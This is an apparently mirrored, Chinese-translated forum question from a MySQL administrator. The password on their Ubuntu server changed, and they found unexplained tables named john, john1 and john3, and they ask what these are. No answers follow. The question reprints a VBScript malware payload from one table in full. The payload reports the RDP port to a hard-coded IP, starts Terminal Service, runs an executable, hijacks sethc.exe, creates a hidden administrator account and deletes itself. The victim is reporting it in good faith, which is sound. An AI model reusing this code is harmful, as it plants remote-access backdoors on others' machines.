MySQL数据库本身的奇怪表

时间:2015-03-19 09:27:45

标签: mysql passwords root

我最近遇到了一个问题,即MySQL的root密码以某种方式被改变了。我已经重置它,虽然它可能只是一个腐败,我做了一些挖掘。在MySQL数据库本身中,我找到了3个名为john,john1和john3的表。

这些表中的第一个有一个很长的记录,其中有以下是人类可读的:

on error resume next

Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then 
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if

Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0 
xPost.Send() 


set obj=wscript.createObject("wscript.shell") 
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide



Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"





Set o=CreateObject("Shell.Users")
Set z=o.create("aspwner")
z.changePassword "qq25896!@#",""
z.setting("AccountType")=3

Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit
====

是否有人能够对这可能是什么有所了解?我对这些表格有点怀疑。我不想在没有先了解它们可能是什么的情况下删除它们,因为它是一个生产MySQL安装。

在Ubuntu 13.10系统上,MySQL版本为5.5.35。

0 个答案:

没有答案